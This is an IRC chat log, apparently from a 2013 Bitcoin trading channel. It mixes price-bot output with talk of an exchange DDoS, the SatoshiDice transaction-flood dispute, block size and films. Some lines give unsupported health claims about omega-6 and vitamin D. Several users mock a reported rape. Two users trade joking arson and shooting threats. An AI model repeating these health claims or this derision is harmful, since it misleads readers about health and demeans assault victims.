clumsy Mar 08 01:43:06 we, clumpy Mar 08 01:43:09 heheh Mar 08 01:43:29 it is strange though... its like they kick up the ASCIs and grab a few blocks then turn 'em down to keep the difficulty in check? Mar 08 01:43:48 [BTCTC] [B.YABMC] 1 @ 0.00898 BTC [+] Mar 08 01:43:50 [BTCTC] [B.YABMC] 9 @ 0.00899 = 0.0809 BTC [+] Mar 08 01:43:52 thatwouldn't work afaik Mar 08 01:43:59 thats good! lol Mar 08 01:44:03 im not sure wtf is goin on Mar 08 01:45:55 mod6 maybe overheating issues Mar 08 01:48:20 ahh. Mar 08 01:48:35 clock buffers. Mar 08 01:53:59 ;;bc,diff Mar 08 01:54:00 4367876.0008422 Mar 08 01:54:08 ;;estimate Mar 08 01:54:09 Next difficulty estimate | 4749519.86453 based on data since last change | 4759411.19664 based on data for last three days Mar 08 01:59:11 [BTCTC] [SYNERGY] 1 @ 0.08999 BTC [+] Mar 08 02:02:04 allo kakobrekla Mar 08 02:02:19 allo allo Mar 08 02:02:26 [BTCTC] [B.YABMC] 1 @ 0.00898 BTC [-] Mar 08 02:02:41 may i please have user name for mpex socket? Mar 08 02:02:49 [BTCTC] [B.YABMC] 4 @ 0.00899 = 0.036 BTC [+] Mar 08 02:03:10 see pm Mar 08 02:04:02 [BTCTC] [RSM] 100 @ 0.009 = 0.9 BTC [+] Mar 08 02:16:17 ;;tslb Mar 08 02:16:19 Time since last block: 3 minutes and 20 seconds Mar 08 02:47:51 freenode under DDoS Mar 08 02:48:02 SELL SELL SELL Mar 08 02:51:55 heh Mar 08 02:52:11 selll Mar 08 02:52:12 sell Mar 08 02:53:53 error4733 did they announce ? Mar 08 02:55:03 mp is your trolling SA contest still up for grabs? Mar 08 02:55:31 sure. Mar 08 02:55:40 im trolling gfaqs with coins as practice.. still training Mar 08 02:55:40 lol Mar 08 02:55:41 kk Mar 08 02:55:53 lol remember when i used to pay .5 btc for an account there Mar 08 02:55:57 [BTCTC] [S.MPOE-PT] 389 @ 0.0007 = 0.2723 BTC [-] Mar 08 02:55:59 now it's like... 0.2 ? Mar 08 02:56:03 lol. Mar 08 02:56:11 yah i guess Mar 08 02:56:19 they shrunk. Mar 08 02:59:38 someone gambled 17 BTC to S.Dice with their Mt gox account Mar 08 02:59:44 it seems the gamble won.. Mar 08 02:59:56 but theres no way to tel from which account it came from... Mar 08 03:00:03 so the gambler is SOL it seems Mar 08 03:01:42 ouch Mar 08 03:01:48 pity we don't have the rota anymoar. Mar 08 03:02:31 maybe that guy was angle shooting Mar 08 03:02:40 saying he accidentally sent it to dice instead of his account Mar 08 03:02:48 so erik would refund him Mar 08 03:03:01 the same thing happened to this dude back then in dec, lost 50 btc Mar 08 03:05:02 possibly so. Mar 08 03:12:33 Bowjob: There's someone on the forum just claiming 21 lost that way. Mar 08 03:12:49 yeah were tlking about the same guy Mar 08 03:13:02 he bet 17, won it.. but then the money got sent to mt gox Mar 08 03:13:23 > but theres no way to tel from which account it came from... Mar 08 03:13:30 You mean to which Mt. Gox account it went. Mar 08 03:14:50 Well, Mt Gox can tell. They have better things to do than track down mistakenly made SD payments though. Mar 08 03:16:07 ;;ticker Mar 08 03:16:07 BTCUSD ticker | Best bid: 42.38580, Best ask: 42.39209, Bid-ask spread: 0.00629, Last trade: 42.39209, 24 hour volume: 118703.21738512, 24 hour low: 36.00000, 24 hour high: 45.50000, 24 hour vwap: 42.39283 Mar 08 03:24:09 that guy must be real confused. Mar 08 03:24:30 hey, is it the guy who misidentified someone else's bet on bitbet as his own and rose hell here a few days ago ? Mar 08 03:25:11 If only I could reread that post on Trilema... Mar 08 03:25:17 BingoBongo which ? Mar 08 03:25:38 The BBet post. Mar 08 03:25:40 o o Mar 08 03:25:46 Mr. Imaginary bet. Mar 08 03:26:31 I actually came on here today because i was wondering why I couldn't ready your classic on the housing crisis. Mar 08 03:26:45 *read Mar 08 03:27:26 B0g4r7_ beetlebee BenderCoin BingoBongo bit14 BitHub bitit blu3gr1ffon Bowjob BTCTrader2 burnside Mar 08 03:27:29 BingoBongo http://pastebin.com/TkqAG5ie Mar 08 03:28:19 Thanks. Have you though about just storing a copy of the Trilema archive in the namecoin blockchain. I don't think they'd mind. Mar 08 03:28:36 you know trilema is like 7k articles, over 10mb of plaintext Mar 08 03:28:40 ahem Mar 08 03:28:54 over 10mn words = like 70mb of text Mar 08 03:28:54 It's namecoin. They'll take anything. Mar 08 03:28:58 lmao Mar 08 03:29:17 lol oh yeah JimRogers Mar 08 03:38:42 ;;calc 2.5 / 7 Mar 08 03:38:42 0.357142857143 Mar 08 03:38:56 ;;calc (2.5 / 7) * 140 Mar 08 03:38:56 50 Mar 08 03:39:34 ;;ticker Mar 08 03:39:34 BTCUSD ticker | Best bid: 42.70000, Best ask: 42.81500, Bid-ask spread: 0.11500, Last trade: 42.78384, 24 hour volume: 114078.83449030, 24 hour low: 36.00000, 24 hour high: 45.50000, 24 hour vwap: 42.60795 Mar 08 03:39:45 ;;estimate Mar 08 03:39:46 Next difficulty estimate | 4755826.83674 based on data since last change | 4747165.78694 based on data for last three days Mar 08 03:39:51 ;;asks 1000 Mar 08 03:39:58 There are currently 111370.77 bitcoins offered at or under 1000.0 USD, worth 9613421.27709 USD in total. | Data vintage: 0.0052 seconds Mar 08 03:40:36 Sell orders about trippled since the last time I asked that... Mar 08 03:41:51 eh Mar 08 03:41:57 wait till they hit 10k Mar 08 03:43:08 They won't hit 10k... Mar 08 03:43:35 ;;asks 10000 Mar 08 03:43:43 There are currently 115133.36 bitcoins offered at or under 10000.0 USD, worth 17157717.7085 USD in total. | Data vintage: 0.0056 seconds Mar 08 03:44:03 Maybe they will... Mar 08 03:44:22 No... Mar 08 03:44:38 as price go up, people tend to start putting money in the way. Mar 08 03:45:54 ;;asks 100 Mar 08 03:46:03 There are currently 98810.011 bitcoins offered at or under 100.0 USD, worth 5632319.28639 USD in total. | Data vintage: 0.0051 seconds Mar 08 03:47:59 So no manual deposit I get it... Mar 08 03:53:03 What happened to MPEX? Mar 08 03:53:38 being DDoS'ed Mar 08 03:53:50 What type of ddos? Mar 08 03:53:58 I have no idea Mar 08 03:54:09 anyway, MPEx will be getting an upgrade too Mar 08 03:54:28 ;;ticker Mar 08 03:54:29 BTCUSD ticker | Best bid: 41.75902, Best ask: 41.98351, Bid-ask spread: 0.22449, Last trade: 41.75902, 24 hour volume: 112921.07904056, 24 hour low: 36.00000, 24 hour high: 45.50000, 24 hour vwap: 42.64678 Mar 08 03:54:31 You can access MPEx from a proxy such as: http://mpex.coinbr.com/ Mar 08 03:54:37 oh no. we are crashing again Mar 08 03:54:41 But you'll see there's an updating message. Mar 08 03:54:46 Bowjob: of course... Mar 08 03:55:04 erk Mar 08 03:55:28 Why would price madly like that and stay like that? Mar 08 03:56:17 i'm gona have to say bitcoin Mar 08 03:58:39 Wrong answer... that's the answer to why it raised, not why it would stay like that. Mar 08 03:59:04 heh Mar 08 04:03:50 its a jcsham Mar 08 04:03:58 You'd be surprised Namworld the things that Dunning-Kruger can explain. It's like the new Goodwin, but for the Slate crowd. Mar 08 04:06:39 What does Dunning-Kruger has to do with it? Mar 08 04:07:23 Everyone thinks they're skilled because they buy BTC higher and higher because it keeps going higher and higher? Mar 08 04:07:40 It's why we could hit 10,000. Coinlab biting off more than they can chew and somehow instead of a flash crash we get a flash rally when they are hacked. Also yes your second point. Mar 08 04:08:50 A combination of the two could probably make a new normal though. Mar 08 04:09:00 mpex still down? Mar 08 04:09:25 yes Mar 08 04:09:52 thanks, is there any status of the DDOS? Mar 08 04:10:11 I bet after it all settles, people who kept buying will be apoplectic with explanations and sound just like people after the dotcom bubble... Mar 08 04:11:20 I will tell u skilled Mar 08 04:11:47 Sell 500 at 47-48.89 Mar 08 04:12:06 Buy 200 @ 36.17 and 33.335 Mar 08 04:12:27 Sell 100@ 44.47 Mar 08 04:12:43 Chilca: sounds like it is ongoing but mpex has now been taken offline for upgrades Mar 08 04:12:47 Sign up for gox wire Mar 08 04:13:05 Come back mpex Mar 08 04:14:17 Bitcoin chart reminds me of silver chart,just compressed Mar 08 04:14:28 MPEx is a bit late on schedule for the upgrades Mar 08 04:14:45 he said the 8th Mar 08 04:15:27 well... it's like 4am on the 8th so. Mar 08 04:15:32 a bit later than 1am Mar 08 04:15:48 yeah Mar 08 04:15:55 its actually 3pm on teh 8th Mar 08 04:16:02 in the earliest TZ anyway Mar 08 04:16:06 a well Mar 08 04:16:08 Honestly, with upgrades, it's always hard to estimate. Mar 08 04:16:27 ;;ticker Mar 08 04:16:27 BTCUSD ticker | Best bid: 41.80100, Best ask: 41.98351, Bid-ask spread: 0.18251, Last trade: 41.91771, 24 hour volume: 109127.80902302, 24 hour low: 36.00000, 24 hour high: 45.50000, 24 hour vwap: 42.65552 Mar 08 04:16:37 Can take twice or half the time or more. Mar 08 04:17:17 anyweay, the first irc bot should be around in a few hours i think Mar 08 04:17:29 irc bot? Mar 08 04:17:34 yes. Mar 08 04:18:45 I'm curious about that now. Mar 08 04:20:58 oh? Mar 08 04:22:09 @CoinBr What's the point of having a support forum if you're not going to use it more major stuff like this? Mar 08 04:23:10 you can get to coinbr? Mar 08 04:25:19 oh bitcoinforum.com, good point Mar 08 04:25:44 @dub, yeah Mar 08 04:28:06 jborkl @ 3:14 http://www.businessinsider.com/this-chart-of-bitcoins-is-bananas-and-it-looks-a-lot-like-the-price-of-gold-2013-3 Mar 08 04:30:45 CoinBr also seems to have a twitter account that could have used an update. There are so many better ways to let customers know what the hell is going on than just IRC. Mar 08 04:34:26 reddddd there's nothing better than irc. Mar 08 04:35:03 Namworld you'll be able to go something like #post blabla and the bot will answer with an url to a pastebin with your response. Mar 08 04:35:09 where ofcourse blabla is the pastebin id Mar 08 04:36:05 [HAVELOCK] [SDICE] 2 @ 0.444 = 0.888 BTC [+] Mar 08 04:36:06 [HAVELOCK] [SDICE] 4 @ 0.440001 = 1.76 BTC [-] Mar 08 04:36:08 [HAVELOCK] [SDICE] 3 @ 0.44000006 = 1.32 BTC [-] Mar 08 04:37:25 neat Mar 08 04:45:05 [HAVELOCK] [SDICE] 8 @ 0.5 = 4 BTC [+] Mar 08 04:49:04 [HAVELOCK] [SDICE] 20 @ 0.5 = 10 BTC [+] Mar 08 04:50:43 -dev is so retarded Mar 08 04:51:04 What's happening in there? Mar 08 04:51:44 novels are being written to explain how fees work to a novice Mar 08 04:52:22 the simple answer is bitcoin is stupid wrt fees Mar 08 04:59:54 ;;ticker Mar 08 04:59:55 BTCUSD ticker | Best bid: 42.62827, Best ask: 42.79000, Bid-ask spread: 0.16173, Last trade: 42.80000, 24 hour volume: 104745.97636275, 24 hour low: 36.00000, 24 hour high: 45.50000, 24 hour vwap: 42.61786 Mar 08 05:13:37 "Pimples can be treated by various acne medications prescribed by a dermatologist, or purchased at a drug store with a wide variety of treatments." Mar 08 05:13:46 dude i dunno if i'd purchase pimples Mar 08 05:13:49 even at the store. Mar 08 05:15:00 mircea_popescu: ... Mar 08 05:15:38 You know medicine is fucked when leukemia is easier to treat than pimples. Mar 08 05:15:49 im just quoting from the retardopedia. Mar 08 05:16:06 you know, back 300 years ago when the encyclopedists came up with the first one, it was a monument of erudition Mar 08 05:16:08 and good writing. Mar 08 05:16:24 No encyclopedia has ever been good Mar 08 05:17:12 diderot & d'alembert's was. Mar 08 05:17:12 pimples is very easy to treat Mar 08 05:17:25 modern medicine refuses to accept the treatment because they can't charge obscene amounts of money for it Mar 08 05:17:43 take high doses of omega 6 for the rest of your life. Mar 08 05:17:43 My french isn't good enough to make an informed opinion on Diderot's Mar 08 05:17:56 not only does it cure pimples, it cures and lessens lots of other things Mar 08 05:18:15 Leukemia is easy to treat too. Eat a bunch of methotrexate and live. Mar 08 05:18:20 through in 5000 IU of vitamin D daily, and you'll probably add another ten years to your life Mar 08 05:18:46 BingoBongo pick a page and read outloud Mar 08 05:18:56 im willing to go on a limb and say you'll get my point Mar 08 05:23:05 What am I reading from again, Retardo-wiki'wiki'wiki'wha? Mar 08 05:23:36 BingoBongo l'encyclopedie. Mar 08 05:24:35 l'encyclopedie Mar 08 05:29:39 Rubeta: a poison derived from the juice of a frog. Juvenal wrote of a lady who mingled this kind of poison in wine and presented it to her husband Mar 08 05:31:08 from http://www.alembert.fr/index.php?option=com_content&view=article&id=611399672&catid=665689230:poison&Itemid=127 Mar 08 05:33:01 Seems almost more like a dictionary Mar 08 05:33:17 I'll dig deeper Mar 08 05:35:47 What little french I've read mircea_popescu has been at least 200 years newer Mar 08 05:37:35 :p Mar 08 05:38:06 you don't have to translate it Mar 08 05:38:10 just read it, outloud. Mar 08 05:38:52 almost time for teh weekend Mar 08 05:39:24 Ce qu'on appelle bonheur, est une idée abstraite, composée de quelques idées de plaisir ; car qui n'a qu'un moment de plaisir n'est point un homme heureux ; de même qu'un moment de douleur ne fait point un homme malheureux. Le plaisir est plus rapide que le bonheur, & le bonheur plus passager que la félicité. Quand on dit je suis heureux dans ce moment, on abuse du mot, & cela ne veut dire que j'ai du plaisir : q Mar 08 05:39:24 uand on a des plaisirs un peu répétés, on peut dans cet espace de tems se dire heureux ; quand ce bonheur dure un peu plus, c'est un état de félicité ; on est quelquefois bien loin d'être heureux dans la prospérité, comme un malade dégoûté ne mange rien d'un grand festin préparé pour lui. Mar 08 05:44:02 "bonheur" Mar 08 05:44:06 =boner? Mar 08 05:47:35 sorta like a low roar happines Mar 08 05:48:56 mircea_popescu it isn't that unlike James Mar 08 05:49:47 It is a familiar sentiment Mar 08 05:50:09 james who ? Mar 08 05:51:11 mircea coming to australia this weekend? Mar 08 05:51:27 William James, one of maybe three Americans introspective enough about the pecuiar brand of manic misery here to approach a reasonble target for a philosopher Mar 08 05:52:16 ah william james. okay Mar 08 05:52:23 BitHub not bloody likely :D Mar 08 05:52:35 haha Mar 08 05:52:40 where the bloody hell are ya Mar 08 05:52:44 timisoara. Mar 08 05:53:23 lets go visit kimdotcom i'm bored Mar 08 05:53:47 bloody hell. Mar 08 05:53:56 send a wire. nothing happens. Mar 08 05:53:59 lul Mar 08 05:54:04 call the bank ready to bite their head off for being idiots Mar 08 05:54:06 bloody hell Mar 08 05:54:12 turns out... the... wire...system... is... down. Mar 08 05:54:19 what the fuck are these people doing over there. Mar 08 05:54:19 seems odd when someone else says it Mar 08 05:54:30 being a bunch of cunty's? Mar 08 05:54:34 the us is falling apart. Mar 08 05:54:54 i mean, bitcoin transactions taking 6 hours ? okay. its some internet funny money nobody heard about. Mar 08 05:55:06 but when my banker has to tell me he failed because the wire system is down... Mar 08 05:55:06 dood stop complaining Mar 08 05:55:15 i had to sit a cafe for 6 hours just to wait for 1 confirm Mar 08 05:55:16 it's not even complaining. i'm awed i guess. Mar 08 05:55:17 it was hell Mar 08 06:07:42 sup mpexbot Mar 08 06:09:45 (20:09) < BitHub> DEATH TO SD Mar 08 06:09:58 here we go again Mar 08 06:10:12 lol he's trolling. Mar 08 06:10:31 i didn't care before till i had to start waiting hours and hours and hours for 1 confirm Mar 08 06:10:34 now its personal Mar 08 06:10:41 ahh, successfull troll 9/10 Mar 08 06:10:55 oh no troll then Mar 08 06:11:21 guess that makes me successfull troll 10/10 Mar 08 06:16:30 mod6 agreed Mar 08 06:16:34 like adhd chat Mar 08 06:16:56 this stuff about SD is getting out of hand Mar 08 06:17:19 i don't care so much about SD Mar 08 06:17:30 if txns aren't going through that's a problem Mar 08 06:17:41 a problem i think miners should capitalize on Mar 08 06:18:20 i'm not sure how though Mar 08 06:18:35 if SD wants its blocks mined it needs to pay a toll Mar 08 06:18:41 it needs a pool in its pocket Mar 08 06:18:46 how goes the mpex upgrades/"overhaul" ? Mar 08 06:19:26 that's why i pay a fee on my txns, because i want them to go through Mar 08 06:20:03 i agree Mar 08 06:20:10 slap a toll in there Mar 08 06:20:23 specialized pools should crop up soon Mar 08 06:20:42 what is going on... Mar 08 06:20:47 so you mean just a mining farm just for SD transactions? Mar 08 06:20:49 so tx's are not being processed at all? Mar 08 06:21:07 in some cases they are backing up because of the 250kb block limit Mar 08 06:21:12 afaiunderstand it Mar 08 06:21:28 luke-jr and others primarily blame this on SD Mar 08 06:22:06 and then some say the devs should all hold hands and increase it Mar 08 06:22:49 I blame bitvisitor. At least some SD transactions carry appreciable amunts of bitcoins. Mar 08 06:22:56 yeah, read about that shit earlier... Mar 08 06:23:19 today has been insane even outside of btc today, hard to keep up Mar 08 06:23:36 so basically btc is fucked Mar 08 06:24:44 Btc is only fucked in the sense it is having fun getting its dick wet Mar 08 06:24:48 if they move up to 1Mb that buys them some time, but isn't any different then what the global central banks are doing Mar 08 06:24:51 buying time Mar 08 06:24:53 https://bitcointalk.org/index.php?topic=150405.0;topicseen Mar 08 06:25:04 the "SD is spam" idea has traction Mar 08 06:26:53 yeah, looks like it Mar 08 06:27:09 http://www.mail-archive.com/cryptography@metzdowd.com/msg09964.html Mar 08 06:27:23 At first, most users would run network nodes, but as the Mar 08 06:27:23 network grows beyond a certain point, it would be left more and more to Mar 08 06:27:24 specialists with server farms of specialized hardware. A server farm would Mar 08 06:27:24 only need to have one node on the network and the rest of the LAN connects with Mar 08 06:27:24 that one node. Mar 08 06:27:44 assume we're close to the point of full node/ merkle nodes Mar 08 06:28:01 what happens to SD if pools or full nodes implement that patch Mar 08 06:28:26 jcpham: dude Mar 08 06:28:27 as it stands Mar 08 06:28:33 without any patch Mar 08 06:28:44 bitcoin will just shove SD tx out because they don't pay fees Mar 08 06:29:01 i got so angry i sold over 1000 sdice shares for whatever the fuck price, something cheap and nasty Mar 08 06:29:01 too much tin foil Mar 08 06:29:04 fuck them Mar 08 06:29:12 not enough beer. my apologies Mar 08 06:29:27 i'm gonna guess they will cut SD out, and then SD will just pay fees and maybe raise betting levels? Mar 08 06:30:25 there was talk about raising min fee to .01 or something, but that doesn't give incentive to not use anything else gay like PP Mar 08 06:31:43 now, see, i thought that EV kept sayin how he pays fee's and the miners are getting rich off the fee's alone... Mar 08 06:32:03 ala, something like `SD has paid more in fee's than all the rest of the tx's combined'... must find link... Mar 08 06:32:06 one sec. Mar 08 06:33:19 https://bitcointalk.org/index.php?topic=145510.msg1559267#msg1559267 Mar 08 06:33:22 there Mar 08 06:33:54 $coin Mar 08 06:33:54 smickles: Error: "coin" is not a valid command. Mar 08 06:34:04 fffffffuuuuuuuuuuuu Mar 08 06:36:08 so i think that SD pays the fee's which is what got me so worked up this morning reading all of Luke-jr's crusade to rid the world of SD Mar 08 06:36:38 but the blocksize thing is a seperate problem. Mar 08 06:38:33 Btc is only fucked in the sense it is having fun getting its dick wet << this. Mar 08 06:38:42 how goes the mpex upgrades/"overhaul" ? << the mpexbot just showed up Mar 08 06:39:17 jcpham read the next reply from that dude. Mar 08 06:39:18 http://www.mail-archive.com/cryptography@metzdowd.com/msg09968.html Mar 08 06:39:23 he's brilliant. Mar 08 06:39:26 $OIX Mar 08 06:39:26 BingoBongo: Error: "OIX" is not a valid command. Mar 08 06:39:27 who is he anyway ? Mar 08 06:39:39 $dix Mar 08 06:39:39 mircea_popescu: Error: "dix" is not a valid command. Mar 08 06:39:47 can we speculate that the ddos against mpex is retaliation for SD spam? Mar 08 06:39:59 maybe Mar 08 06:40:16 lol i don't think luke has the resources for something like this. Mar 08 06:40:20 what's the price of SD now? Mar 08 06:40:32 wonder if its gone down a bit Mar 08 06:40:34 BitHub not appreciably changed. Mar 08 06:40:49 not like yesterday when everyone thought mpex was done for hey Mar 08 06:41:04 Luke has too well developed though weird sense of ethics for a DDOS Mar 08 06:41:20 that message thread may wind up framed in the luvre or some shit Mar 08 06:41:35 they did ?! Mar 08 06:41:50 yeah remember mircea everyone in otc was panicing Mar 08 06:41:52 lulz Mar 08 06:41:54 lol Mar 08 06:42:01 mpex ain't done for till i say Mar 08 06:42:05 and i'm niot even fat. Mar 08 06:42:31 fiat :P Mar 08 06:42:38 anyone saw "seek and destroy" ? Mar 08 06:42:43 christopher walken movie Mar 08 06:43:08 ummm nope Mar 08 06:43:13 good? Mar 08 06:43:20 its surreal Mar 08 06:43:42 mircea_popescu you should partake in -otc for a bit Mar 08 06:43:43 i dunno why it didn't get more traction, should be a cult classic. Mar 08 06:43:50 it's total anarchy Mar 08 06:43:50 what year? Mar 08 06:43:54 1995 Mar 08 06:43:57 jcpham lol Mar 08 06:44:00 it's total anarchy Mar 08 06:44:03 my bad jcpham Mar 08 06:44:06 i think its my fault Mar 08 06:44:13 nope Mar 08 06:44:29 channel needs desperately to be +m Mar 08 06:44:41 pity it's +m and not +fuckyouyourestupid Mar 08 06:44:47 which would be the proper name of that flag Mar 08 06:44:50 i guess it's too long Mar 08 06:45:13 are you sure he's in that movie mircea? Mar 08 06:45:18 nothing on imdb Mar 08 06:45:18 yes im sure. Mar 08 06:45:23 hum lets see Mar 08 06:45:38 http://www.imdb.com/title/tt0114371/ Mar 08 06:45:43 tghere. scorsese also has a cameo Mar 08 06:45:51 he plays a tax accountant for the state of florida lol Mar 08 06:45:53 ahh search not seek :P Mar 08 06:45:56 lul scorses wtf Mar 08 06:45:58 o sorry my bad Mar 08 06:46:02 i just realized the other day that mario puzo did superman Mar 08 06:46:08 the original screenplay Mar 08 06:46:18 nice same guy as godfather Mar 08 06:46:20 and jor-el is the fucking godfather Mar 08 06:46:38 ahh yeah that's right he did play jor-el Mar 08 06:46:54 do you think when they were filming the godfather and made money Mar 08 06:46:59 marlon brando was like Mar 08 06:47:06 you know i'd really like to be superman Mar 08 06:47:21 lol Mar 08 06:47:27 fuck man how good was marlon brando Mar 08 06:47:30 and that was as close as he came to it Mar 08 06:47:36 jcpham do you know the one where marlon brando went like... hey, i'd like to rape this 19 yo Mar 08 06:47:39 and so they did it ? Mar 08 06:47:53 hrm sounds questionably legal Mar 08 06:47:54 wat? Mar 08 06:47:57 yeah. Mar 08 06:48:05 girl got total rape victim shock syndrome Mar 08 06:48:11 These morons are gonna kill Bitcoin with this anti-SD crusade… Mar 08 06:48:14 became like, a feminist and everything. total tableau. Mar 08 06:48:21 he raped someone? Mar 08 06:48:35 maximian tell you something : if morons are gonna kills anything then fuck that anything. Mar 08 06:48:41 BitHub yes. Mar 08 06:48:46 anal sex too Mar 08 06:48:48 with butter. Mar 08 06:48:50 i doubt it Mar 08 06:48:56 its a fact. Mar 08 06:49:07 nah Mar 08 06:49:29 The anti-SD crusade isn't going to kill bitcoin. The crusaders are more people who liberated their bitcoins by freeing them into S.Dice's arms. Probably... except for Luke. Mar 08 06:49:32 the problem is their little "SD is spam" meme is starting to spread Mar 08 06:49:50 (20:48) < maximian> These morons are gonna kill Bitcoin with this anti-SD crusade... <<< this Mar 08 06:49:50 the coolest thing about brando was when he sent an indian woman to collect his oscar for his role in the godfather Mar 08 06:50:04 BitHub http://www.dailymail.co.uk/tvshowbiz/article-469646/I-felt-raped-Brando.html Mar 08 06:50:22 i "felt" raped Mar 08 06:50:24 lulz Mar 08 06:50:32 maximian mod6 people fail to realise this, but there's a good reason and great strategic advantage in the girl's fuck you attitude. Mar 08 06:50:32 (20:46) <+mod6> "First, SD has paid more mining fees than everyone else in the world, combined." << Is this a lie? Mar 08 06:50:40 (20:46) <+Luke-Jr> mod6: yes Mar 08 06:50:45 there it is folks Mar 08 06:51:00 oh yeah i remember this movie Mar 08 06:51:07 it was pretty friggen psycho Mar 08 06:51:10 no meme spreads past the point where someone's holding a club Mar 08 06:51:19 i doubt it tho mircea Mar 08 06:51:30 mod6 the guy's insane, sd paid like 55% of all fees ever paid Mar 08 06:51:30 DailyAnarchist put it right it a bitcointalk thread: if nobody knew what the source of these "spam" transactions were, then the discussion would be about how to improve the system to handle more transactions. The fact that the crusaders know these transactions are from SatoshiDice has clouded their judgement. Mar 08 06:51:49 maximian its not even that. Mar 08 06:51:54 mircea_popescu: im /nearly/ at a loss for words. Mar 08 06:51:55 but even if he did, meh that's his personal life, still the best actor Mar 08 06:51:59 it's simple drama. some people who mean very little started to notice. Mar 08 06:52:06 and are trying to inject themselves into the public eye Mar 08 06:52:16 how is that accomplished ? why, crusade for "the betterment". Mar 08 06:52:21 Luke-Jr is a sort of bitcoin obama. Mar 08 06:52:30 the thing is... unlike fiat that shit doesn't work here. Mar 08 06:52:34 bitcoin obama lulz Mar 08 06:52:37 well... for anything other than comedic relief. Mar 08 06:52:50 he gave me a pretty lulz neg review Mar 08 06:52:50 heheh Mar 08 06:52:54 at any rate, drama backs bitcoin, so, all this is good. Mar 08 06:53:07 BitHub: and you're on Luke-jr's side?!?!? Mar 08 06:53:15 it raises my hackles, I tell you! :) Mar 08 06:53:32 heh i'm not on his side Mar 08 06:53:39 but i do have beef with sdice atm Mar 08 06:53:39 mircea_popescu: haha drama is right. BTC has more drama than Lifetime Channel. Mar 08 06:54:02 mod6 imagine how it'll be when women finally discover it. Mar 08 06:54:26 otc made out of ~100 middle aged women with nothing better to do Mar 08 06:55:19 bitcoin-assets we've taken the family car apart six times today just to get some quiet time Mar 08 06:55:39 (20:54) < jcpham> luke-jr if you don't stfu about SD i'm going to burn your church down Mar 08 06:55:40 lol Mar 08 06:55:49 (20:54) <+Luke-Jr> jcpham: I'll be there to shoot you when you try. Mar 08 06:55:50 (20:55) < jcpham> :) Mar 08 06:55:55 (20:55) <+mod6> wwjd Mar 08 06:55:58 where's that church anyway ? Mar 08 06:56:52 Rome isn't it? He's catholic his local stuff doesn't matter. I just wonder which of the BitBet pope bets are his. Mar 08 06:56:53 FL i guess Mar 08 06:57:41 GoDaddy got semi famous off the savetoby controversy. Then got really famous off the Superbowl controversy. I think S.Dice should milk this controversy for everything it's got. shout S.Dice is spam from the mountaintops Mar 08 06:58:03 I own shares btw Mar 08 06:58:42 http://savetoby.com/ Mar 08 06:59:37 lol Mar 08 06:59:43 (20:58) <+Luke-Jr> anyhow, I was just trying to get a feel for how many people would run a counter-SD client if I take the time to write the code Mar 08 06:59:45 i dunno, goddady is a piece of shit. Mar 08 06:59:48 this is like his own fork isn't it? Mar 08 06:59:53 evoorhees should reinvest his profits into a massive mining pool - that's probably the surest way to make the crusaders irrelevant. Mar 08 07:00:06 i mean he's not saying that, but thats what it is. Mar 08 07:00:09 maximian at this point in the game it's the surest way to go bankrupt. Mar 08 07:00:11 POS name Mar 08 07:00:12 all the scams... Mar 08 07:00:18 maximian: the surest way is to stop flooding and implement SD properly Mar 08 07:00:22 maximian: far cheaper too Mar 08 07:00:28 this is properly dood. Mar 08 07:00:36 "properly" Mar 08 07:00:38 Luke-Jr: what you're proposing is a hard fork of the blockchain right? Mar 08 07:00:40 mod6 so he starts his own client, what's the big deal ? Mar 08 07:00:47 heck, I'd even offer to do it for him except my stupid State has laws against writing code for gambling -.- Mar 08 07:00:51 mod6: no Mar 08 07:00:52 ok. i don't care if he starts his own client. Mar 08 07:00:55 face facts : sooner or later Luke-Jr will end up in a little corner playing with some correct toys nobody cares about Mar 08 07:01:00 serious Luke? Mar 08 07:01:04 as long as everyone else figures out how to solve the block size issue. Mar 08 07:01:05 this is how it goes, nothing wrong in it. Mar 08 07:01:05 laws against writing code? Mar 08 07:01:06 If you didn't know the origin of the transactions, what would you say? Mar 08 07:01:08 SD is another problem Mar 08 07:01:08 that's crazy Mar 08 07:01:10 or not Mar 08 07:01:10 BitHub: yes, it's stupid Mar 08 07:01:25 but... whatever. they're two seperate topics Mar 08 07:01:27 Luke so you could fly to mexico and be all sweet? Mar 08 07:01:29 why the USA has such a big problem with gambling, I'll probably never understand Mar 08 07:01:41 what if SD wasnt a gaming site? Mar 08 07:01:42 BitHub: I'm not interested in relocation to Mexico. Mar 08 07:01:46 so online gambling is illegal but guns is sweet? haha Mar 08 07:01:54 what if it was just some random tx's from the same host that paid the fee's? Mar 08 07:01:57 would you say the same thing? Mar 08 07:02:03 mod6: a flood is a flood. Mar 08 07:02:05 Luke-Jr ya i know was thinking if you spent a week there adn wrote the code, would that be legal? Mar 08 07:02:08 mod6: I don't care how it's financed Mar 08 07:02:16 BitHub: dunno Mar 08 07:02:26 hmm i think you would get away with it :) Mar 08 07:02:45 Luke-Jr: ok. so what happens when there are 1,000,000 bitcoin users and they all create 5 new tx's per day. Mar 08 07:02:53 what then? we just shut the fucking doors and go home? Mar 08 07:03:16 christ on a pony this is idiotic Mar 08 07:03:18 mod6: no, that's far less than SD does Mar 08 07:03:44 you're saying that SD does more than 5 million tx's per day? Mar 08 07:03:56 mod6: I'm saying adoption matters. Mar 08 07:04:03 1,000,000 nodes can handle 5 mil txs Mar 08 07:04:05 [HAVELOCK] [SDICE] 5 @ 0.446 = 2.23 BTC [-] Mar 08 07:04:23 with the current broken bitcoin-qt there will never, ever, no matter what be 1mn nodes. Mar 08 07:04:29 ever. Mar 08 07:04:49 Luke-Jr: yes, adoption matters, you know what I have guys download? something for their android Mar 08 07:04:53 not the full client. Mar 08 07:04:57 i don't want them to wait 3 days Mar 08 07:05:05 mircea_popescu: 1,000,000 users also brings a number more developers onboard Mar 08 07:05:18 Luke-Jr what the fuck are you thinking this is, chicken lay eggs ? Mar 08 07:05:20 mod6: eventually, Bitcoin-Qt will be instant-on Mar 08 07:05:34 herpderp joe sixpack becomes a dev if you aggregate 5000 of them !? Mar 08 07:05:39 money brings devs. Mar 08 07:05:46 [BTCTC] [BASIC-MINING] 1 @ 0.345 BTC [+] Mar 08 07:05:53 http://www.mail-archive.com/cryptography@metzdowd.com/msg09964.html <-- Satoshi on the necessity of adoption to scale Mar 08 07:06:00 there was never good myspace code. ever. Mar 08 07:06:07 myspace had a billion users. Mar 08 07:06:43 the best thing you can do for adoption to scale right now is to fix the motherfucking client. Mar 08 07:06:50 rather than trying to argue with a tank. Mar 08 07:07:16 the client isn't broken. Mar 08 07:07:22 lul myspace Mar 08 07:07:23 